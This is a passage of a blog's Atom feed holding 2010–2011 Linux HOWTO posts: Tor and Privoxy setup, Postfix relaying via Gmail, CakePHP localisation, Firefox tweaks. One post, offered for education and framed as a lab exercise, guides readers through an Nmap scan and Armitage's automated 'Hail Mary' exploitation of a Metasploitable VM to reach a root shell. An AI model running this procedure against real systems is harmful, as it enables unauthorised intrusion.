&lt;code&gt;sudo mkdir /var/www/myproject/locale/zh_TW/LC_MESSAGES&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;sudo cp /var/www/myproject/locale/default.* /var/www/myproject/locale/zh_TW/LC_MESSAGES/&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 6c :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;cd /var/www/myproject/config&lt;/code&gt;&lt;br /&gt;
&lt;code&gt;sudo nano core.php&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
Append the following line to the &lt;code&gt;core.php&lt;/code&gt; :&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;Configure::write('Config.language', 'zh_TW');&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
Restart Hiawatha :&lt;br /&gt;
&lt;code&gt;sudo /etc/init.d/hiawatha restart&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
For example :&lt;br /&gt;
Open the browser and type "&lt;code&gt;localhost/users&lt;/code&gt;", the content will be changed to Traditional Chinese.&lt;br /&gt;
&lt;br /&gt;
*Where "&lt;code&gt;users&lt;/code&gt;" is a Controller and table of a database that you just create.  "&lt;code&gt;users&lt;/code&gt;" is just an example.&lt;br /&gt;
&lt;br /&gt;
That's all!  See you.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/11198812-4846239308030516814?l=samiux.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/11198812/posts/default/4846239308030516814'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/11198812/posts/default/4846239308030516814'/><link rel='alternate' type='text/html' href='http://samiux.blogspot.com/2011/02/howto-cakephp-137-and-hiawatha-74-on.html' title='HOWTO : CakePHP 1.3.7 and Hiawatha 7.4 on Ubuntu Desktop 10.10'/><author><name>Samiux</name><uri>http://www.blogger.com/profile/01092269927993785550</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='18' src='http://1.bp.blogspot.com/-p-tkpN23Rxs/TmZHSbonpZI/AAAAAAAAABw/y9VaAJp9p0I/s220/oscp.png'/></author></entry><entry><id>tag:blogger.com,1999:blog-11198812.post-1302967172330619454</id><published>2011-01-26T15:07:00.000+08:00</published><updated>2011-01-26T15:07:11.619+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Tor Button'/><category scheme='http://www.blogger.com/atom/ns#' term='Tor'/><category scheme='http://www.blogger.com/atom/ns#' term='Privoxy'/><category scheme='http://www.blogger.com/atom/ns#' term='Back|Track'/><title type='text'>HOWTO : Tor on Back|Track 4 R2</title><content type='html'>&lt;b&gt;Step 1 :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Make sure tor and privoxy are installed.&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;apt-get install tor privoxy&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 2 :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;nano /etc/privoxy/config&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
Append the following line to the file.&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;forward-socks4a / localhost:9050 .&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 3 :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;/etc/init.d/privoxy start&lt;br /&gt;
/etc/init.d/tor start&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 4 :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Install tor button on firefox&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;https://addons.mozilla.org/zh-TW/firefox/addon/torbutton/&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
Go to Tor Button perference and set as the following.&lt;br /&gt;
&lt;br /&gt;
Select "&lt;code&gt;Use custom proxy settings&lt;/code&gt;"&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;HTTP Proxy : 127.0.0.1  Port : 8118&lt;br /&gt;
SSL Proxy : 127.0.0.1  Port : 8118&lt;br /&gt;
SOCKS host : 127.0.0.1  Port : 9050&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 5 :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Click on the "&lt;code&gt;Tor enable&lt;/code&gt;" at the right bottom of the Firefox to enable the Tor Button.&lt;br /&gt;
&lt;br /&gt;
Hints : You should repeat the Step 3 and Step 5 when you are using Tor to surf the internet next time.&lt;br /&gt;
&lt;br /&gt;
That's all!  See you.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/11198812-1302967172330619454?l=samiux.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/11198812/posts/default/1302967172330619454'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/11198812/posts/default/1302967172330619454'/><link rel='alternate' type='text/html' href='http://samiux.blogspot.com/2011/01/howto-tor-on-backtrack-4-r2.html' title='HOWTO : Tor on Back|Track 4 R2'/><author><name>Samiux</name><uri>http://www.blogger.com/profile/01092269927993785550</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='18' src='http://1.bp.blogspot.com/-p-tkpN23Rxs/TmZHSbonpZI/AAAAAAAAABw/y9VaAJp9p0I/s220/oscp.png'/></author></entry><entry><id>tag:blogger.com,1999:blog-11198812.post-1349718847833524640</id><published>2011-01-22T02:14:00.003+08:00</published><updated>2011-01-22T09:29:01.243+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Traditional Chinese'/><category scheme='http://www.blogger.com/atom/ns#' term='Back|Track'/><title type='text'>HOWTO : Traditional Chinese support on Back|Track 4 R2</title><content type='html'>Back|Track 4 R2 is an English based Linux distribution.  The Firefox cannot browse Traditional Chinese webpages properly.  This tutorial shows you how to make Back|Track 4 R2 to recognize Traditional Chinese characters on Firefox.&lt;br /&gt;
&lt;br /&gt;
Open the terminal and key in the following :&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;apt-get install language-support-zh language-support-fonts-zh language-support-input-zh language-support-translations-zh language-pack-zh language-pack-zh-base language-pack-kde-zh language-pack-kde-zh-base kde-l10n-zhtw&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
After the installation, reboot your system.&lt;br /&gt;
&lt;br /&gt;
That's all!  See you.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/11198812-1349718847833524640?l=samiux.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/11198812/posts/default/1349718847833524640'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/11198812/posts/default/1349718847833524640'/><link rel='alternate' type='text/html' href='http://samiux.blogspot.com/2011/01/howto-traditional-chinese-support-on.html' title='HOWTO : Traditional Chinese support on Back|Track 4 R2'/><author><name>Samiux</name><uri>http://www.blogger.com/profile/01092269927993785550</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='18' src='http://1.bp.blogspot.com/-p-tkpN23Rxs/TmZHSbonpZI/AAAAAAAAABw/y9VaAJp9p0I/s220/oscp.png'/></author></entry><entry><id>tag:blogger.com,1999:blog-11198812.post-6058788110264187648</id><published>2010-12-22T03:58:00.002+08:00</published><updated>2010-12-22T03:58:12.836+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Postfix'/><category scheme='http://www.blogger.com/atom/ns#' term='GoDaddy'/><category scheme='http://www.blogger.com/atom/ns#' term='Google Apps'/><category scheme='http://www.blogger.com/atom/ns#' term='Untangle'/><title type='text'>HOWTO : GoDaddy.com and Google Apps (Email) with your Domain</title><content type='html'>You can use GMail web mail service with your domain name, such as yourname@yourdomain.com on www.gmail.com.&lt;br /&gt;
&lt;br /&gt;
Follow this &lt;a href="http://samiux.blogspot.com/2010/12/howto-send-mail-to-gmail-by-postfix-on.html"&gt;link&lt;/a&gt; to set up Postfix to use GMail as your SMTP server.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 0 :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Apply of free Google Apps (Free) Email :&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://www.google.com/apps/intl/en/group/index.html"&gt;Google Apps (Free) Email&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 1 :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Create the MX record at your domain &lt;a href="https://www.godaddy.com/gdshop/google/gmail_login.asp"&gt;automatically&lt;/a&gt;.&lt;br /&gt;
&lt;br /&gt;
Create the MX record at your domain &lt;a href="http://www.google.com/support/a/bin/answer.py?hl=en&amp;answer=33353"&gt;manually&lt;/a&gt;.&lt;br /&gt;
&lt;br /&gt;
The MX record are :&lt;br /&gt;
&lt;code&gt;ASPMX.L.GOOGLE.COM&lt;br /&gt;
ALT1.ASPMX.L.GOOGLE.COM&lt;br /&gt;
ALT2.ASPMX.L.GOOGLE.COM&lt;br /&gt;
ASPMX2.GOOGLEMAIL.COM&lt;br /&gt;
ASPMX3.GOOGLEMAIL.COM&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 1a :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Create a &lt;a href="http://www.google.com/support/a/bin/answer.py?answer=178723"&gt;SPF record&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 2 :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
You will receive a email from Google and ask you to create a adminstrator account with your domain name.  Your domain name needs to be authorized to use Google Apps.  You should follow the instructions to complete the process.&lt;br /&gt;
&lt;br /&gt;
After that, you can you GMail as your domain's email.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 3 (Optional) :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
If you are using Untangle as gateway and IPS, you should do the following :&lt;br /&gt;
&lt;br /&gt;
Open a browser and point to Untangle web page as well as login.&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;Config/Networking/Hostname&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
Change the following settings :&lt;br /&gt;
&lt;br /&gt;
From - &lt;br /&gt;
&lt;code&gt;Hostname : untangle.mydomain.com&lt;/code&gt; &lt;br /&gt;
&lt;br /&gt;
To -&lt;br /&gt;
&lt;code&gt;Hostname : untangle.mydomain.local&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 3a (Optional) :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;Config/Email/Outging Email Server (SMTP)&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
Change the following settings :&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;Send Email using the specified SMTP Server&lt;br /&gt;
- Server Address or Hostname : &amp;lt;postifx server IP address&amp;gt;&lt;br /&gt;
- Server Port : 25&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Known issue&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Cannot send to yourself with your domain, e.g. yourname@yourdomain.com via Untangle.&lt;br /&gt;
&lt;br /&gt;
That's all!  See you.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/11198812-6058788110264187648?l=samiux.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/11198812/posts/default/6058788110264187648'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/11198812/posts/default/6058788110264187648'/><link rel='alternate' type='text/html' href='http://samiux.blogspot.com/2010/12/howto-godaddycom-and-google-apps-email.html' title='HOWTO : GoDaddy.com and Google Apps (Email) with your Domain'/><author><name>Samiux</name><uri>http://www.blogger.com/profile/01092269927993785550</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='18' src='http://1.bp.blogspot.com/-p-tkpN23Rxs/TmZHSbonpZI/AAAAAAAAABw/y9VaAJp9p0I/s220/oscp.png'/></author></entry><entry><id>tag:blogger.com,1999:blog-11198812.post-3713002021051400359</id><published>2010-12-22T03:55:00.001+08:00</published><updated>2011-04-13T23:54:40.635+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='GMail'/><category scheme='http://www.blogger.com/atom/ns#' term='Postfix'/><category scheme='http://www.blogger.com/atom/ns#' term='Ubuntu'/><title type='text'>HOWTO : Send Mail to GMail by Postfix on Ubuntu Server 10.10</title><content type='html'>You cannot send any mail to GMail from you mail server, unless you set GMail server as your SMTP server.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 0 :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Install the Ubuntu Server 10.10 and select Mail Server when install.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 1 :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;sudo nano /etc/postfix/transport&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
Append the following line.&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;* &amp;nbsp;&amp;nbsp;&amp;nbsp; smtp:[smtp.gmail.com]:587&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 2 :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;sudo nano /etc/postfix/sasl/sasl_passwd&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
Append the following line.&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;[smtp.gmail.com]:587 &amp;nbsp;&amp;nbsp;&amp;nbsp; samiux@gmail.com:password&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 3 :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;sudo nano /etc/postfix/main.cf&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
Add or make the change of the following lines.&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;relayhost = [smtp.gmail.com]:587&lt;br /&gt;
smtp_sasl_auth_enable = yes&lt;br /&gt;
smtp_sasl_password_maps = hash:/etc/postfix/sasl/sasl_passwd&lt;br /&gt;
smtp_sasl_security_options = noanonymous&lt;br /&gt;
smtp_tls_CAfile = /etc/postfix/cacert.pem&lt;br /&gt;
smtp_use_tls = yes&lt;br /&gt;
mynetworks = 192.168.0.0/24 127.0.0.0/8 [::ffff:127.0.0.0]/104 [::1]/128&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 4 :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;cat /etc/ssl/certs/Thawte_Premium_Server_CA.pem | sudo tee -a /etc/postfix/cacert.pem&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 5 :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;sudo postmap /etc/postfix/transport&lt;br /&gt;
sudo postmap /etc/postfix/sasl/sasl_passwd&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 6 :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;sudo /etc/init.d/postfix restart&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
That's all!  See you.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/11198812-3713002021051400359?l=samiux.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/11198812/posts/default/3713002021051400359'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/11198812/posts/default/3713002021051400359'/><link rel='alternate' type='text/html' href='http://samiux.blogspot.com/2010/12/howto-send-mail-to-gmail-by-postfix-on.html' title='HOWTO : Send Mail to GMail by Postfix on Ubuntu Server 10.10'/><author><name>Samiux</name><uri>http://www.blogger.com/profile/01092269927993785550</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='18' src='http://1.bp.blogspot.com/-p-tkpN23Rxs/TmZHSbonpZI/AAAAAAAAABw/y9VaAJp9p0I/s220/oscp.png'/></author></entry><entry><id>tag:blogger.com,1999:blog-11198812.post-8609870616178810127</id><published>2010-12-16T16:24:00.002+08:00</published><updated>2010-12-16T16:24:53.234+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Firefox'/><title type='text'>HOWTO : Faster Firefox</title><content type='html'>The following steps are for broadband users who are using Firefox and wish it is running more faster.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 0 :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Open Firefox and type the following at the address field.&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;about:config&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 1 :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Change the following value from "&lt;code&gt;false&lt;/code&gt;" to "&lt;code&gt;true&lt;/code&gt;" :&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;network.http.pipelining&lt;br /&gt;
network.http.proxy.pipelining&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 2 :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Change the following value from "&lt;code&gt;4&lt;/code&gt;" to "&lt;code&gt;30&lt;/code&gt;" :&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;network.http.pipelining.maxrequests&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 3 :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
At any browsing area of the browser, add the following string with a value of "&lt;code&gt;0&lt;/code&gt;" : &lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;nglayout.initialpaint.delay&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 4 :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Restart Firefox.  Now, you can browse the web pages more faster.&lt;br /&gt;
&lt;br /&gt;
That's all!  See you.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/11198812-8609870616178810127?l=samiux.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/11198812/posts/default/8609870616178810127'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/11198812/posts/default/8609870616178810127'/><link rel='alternate' type='text/html' href='http://samiux.blogspot.com/2010/12/howto-faster-firefox.html' title='HOWTO : Faster Firefox'/><author><name>Samiux</name><uri>http://www.blogger.com/profile/01092269927993785550</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='18' src='http://1.bp.blogspot.com/-p-tkpN23Rxs/TmZHSbonpZI/AAAAAAAAABw/y9VaAJp9p0I/s220/oscp.png'/></author></entry><entry><id>tag:blogger.com,1999:blog-11198812.post-4744608410671456992</id><published>2010-12-16T10:39:00.007+08:00</published><updated>2010-12-18T15:44:07.768+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Armitage'/><category scheme='http://www.blogger.com/atom/ns#' term='Back|Track'/><category scheme='http://www.blogger.com/atom/ns#' term='Metasploitable'/><category scheme='http://www.blogger.com/atom/ns#' term='Ubuntu'/><title type='text'>HOWTO : No skill hacking with Armitage on Back|Track 4 R2</title><content type='html'>&lt;code&gt;*** WARNING : This tutorial is for education purpose only.  It alert you to update your system once there is any patch or update available.  Please do not hack any website, computer and/or network without authorization.  Otherwise, you will be put into the jail. ***&lt;/code&gt; &lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Prerequisites&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
In order to complete this tutorial, you should have an Ubuntu or Windows system as host.  Back|Track 4 R2 and Metasploitable as clients on VirtualBox 3.2.&lt;br /&gt;
&lt;br /&gt;
You can download Back|Track 4 R2 at &lt;a href="http://www.backtrack-linux.org/downloads/"&gt;here&lt;/a&gt; and Metasploitable at &lt;a href="http://blog.metasploit.com/2010/05/introducing-metasploitable.html"&gt;here&lt;/a&gt;.  Metasploitable is an Ubuntu Server 8.04 that installed some applications with flaws that can be exploited.  &lt;br /&gt;
&lt;br /&gt;
The installation of Back|Track 4 R2 is &lt;a href="http://samiux.blogspot.com/2010/11/howto-setting-up-penetration.html"&gt;here&lt;/a&gt;.&lt;br /&gt;
&lt;br /&gt;
The network interfaces of Back|Track 4 R2 on VirtualBox 3.2 are "NAT and "Host Only (vboxnet0)".  The network interface of Metasploitable is "Host Only (vboxnet0)".&lt;br /&gt;
&lt;br /&gt;
The Armitage should be installed on Back|Track 4 R2 and the tutorial is &lt;a href="http://www.offensive-security.com/backtrack/armitage-in-backtrack-4-r2/"&gt;here&lt;/a&gt;.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 0 :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Run the Metasploitable on VirtualBox first.  The IP address should be 192.168.56.101.  The run Back|Track 4 R2 on VirtualBox the next and the IP address should be 10.x.x.x of eth0.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 1 :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
On the Back|Track 4 R2, run the following command to make sure eth0 and eth1 are up and have their IPs.&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;/etc/init.d/networking restart&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 2 :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Run the following commands to launch Armitage.&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;/etc/init.d/mysql start&lt;br /&gt;
cd /pentest/exploits/armitage&lt;br /&gt;
./armitage.sh&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 3 :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Select "&lt;code&gt;Use SSL&lt;/code&gt;" and click "&lt;code&gt;Start MSF&lt;/code&gt;".&lt;br /&gt;
&lt;br /&gt;
Then, "&lt;code&gt;Using database driver mysql&lt;/code&gt;" message box will be displayed.  Click "&lt;code&gt;OK&lt;/code&gt;".&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 4 :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Select "&lt;code&gt;Host&lt;/code&gt;" -- "&lt;code&gt;Nmap Scan&lt;/code&gt;" -- "&lt;code&gt;Intense Scan, all TCP ports&lt;/code&gt;"&lt;br /&gt;
&lt;br /&gt;
Wait for the scanning complete.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 5 :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Select "&lt;code&gt;Attacks&lt;/code&gt;" -- "&lt;code&gt;Find Attacks&lt;/code&gt;" -- "&lt;code&gt;by port&lt;/code&gt;".&lt;br /&gt;
&lt;br /&gt;
Wait for the scanning complete.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 6 :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Select "&lt;code&gt;Attacks&lt;/code&gt;" -- "&lt;code&gt;Hail Mary&lt;/code&gt;" -- "&lt;code&gt;by port&lt;/code&gt;".&lt;br /&gt;
&lt;br /&gt;
Wait for the "&lt;code&gt;Monitor&lt;/code&gt;" image to change to red colour.  If so, the target is exploited.  Then, right click on the "&lt;code&gt;Monitor&lt;/code&gt;"  image and select "&lt;code&gt;Shell&lt;/code&gt;".  To check if the target is privilege escalated by issuing "&lt;code&gt;whoami&lt;/code&gt;" on the Shell.  If it shows "&lt;code&gt;root&lt;/code&gt;", you are successfully owned the target.&lt;br /&gt;
&lt;br /&gt;
&lt;object width="480" height="385"&gt;&lt;param name="movie" value="http://www.youtube.com/v/76y9gTE1n7k?fs=1&amp;amp;hl=zh_TW"&gt;&lt;/param&gt;&lt;param name="allowFullScreen" value="true"&gt;&lt;/param&gt;&lt;param name="allowscriptaccess" value="always"&gt;&lt;/param&gt;&lt;embed src="http://www.youtube.com/v/76y9gTE1n7k?fs=1&amp;amp;hl=zh_TW" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="480" height="385"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;br /&gt;
&lt;br /&gt;
That's all!  See you.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/11198812-4744608410671456992?l=samiux.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/11198812/posts/default/4744608410671456992'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/11198812/posts/default/4744608410671456992'/><link rel='alternate' type='text/html' href='http://samiux.blogspot.com/2010/12/howto-no-skill-hacking-with-armitage-on.html' title='HOWTO : No skill hacking with Armitage on Back|Track 4 R2'/><author><name>Samiux</name><uri>http://www.blogger.com/profile/01092269927993785550</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='18' src='http://1.bp.blogspot.com/-p-tkpN23Rxs/TmZHSbonpZI/AAAAAAAAABw/y9VaAJp9p0I/s220/oscp.png'/></author></entry><entry><id>tag:blogger.com,1999:blog-11198812.post-727679273349280281</id><published>2010-12-08T05:23:00.004+08:00</published><updated>2010-12-08T05:38:10.591+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='TorButton'/><category scheme='http://www.blogger.com/atom/ns#' term='Tor'/><category scheme='http://www.blogger.com/atom/ns#' term='Privoxy'/><category scheme='http://www.blogger.com/atom/ns#' term='Ubuntu'/><category scheme='http://www.blogger.com/atom/ns#' term='Firefox'/><title type='text'>HOWTO : The Onion Router (Tor) on Ubuntu 10.10 Desktop</title><content type='html'>&lt;a href="https://www.torproject.org/about/overview.html.en"&gt;Tor Overview&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 1 :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;sudo nano /etc/apt/sources.list&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
Append the following line to the file :&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;deb http://deb.torproject.org/torproject.org lucid main&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
Save and exit.  Then add the key :&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;gpg --keyserver keys.gnupg.net --recv 886DDD89&lt;br /&gt;
gpg --export A3C4F0F979CAA22CDBA8F512EE8CBC9E886DDD89 | sudo apt-key add -&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
Install tor.&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;sudo apt-get install tor&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 2 :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Install Privoxy.&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;sudo apt-get install privoxy&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
Edit the configure file of privoxy.&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;sudo nano /etc/privoxy/config&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
Append the following line.&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;forward-socks4a / localhost:9050 .&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 2a (Optional) :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
If you are behind firewall or NAT as well as router, you should append the following line at the configure file.&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;forward 192.168.*.*/ .&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 3 :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Made sure Tor is working.&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;sudo /etc/init.d/privoxy start&lt;br /&gt;
sudo /etc/init.d/tor start&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;netstat -a | grep 9050&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
If the output is similar to the following line, your Tor is working.&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;tcp 0 0 localhost:9050 *:* LISTEN&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 4 :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Get "&lt;code&gt;TorButton&lt;/code&gt;" addon for Firefox.  Then enable/disable it by &lt;code&gt;Ctrl+2&lt;/code&gt;.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 5 :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
You can confirm the Tor is working on the remote side by visiting the following site.&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://check.torproject.org"&gt;check.torproject.org&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 6 (Optional) :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
If the System start/stop links do not exist, please issue the following commands :&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;sudo update-rc.d privoxy defaults&lt;br /&gt;
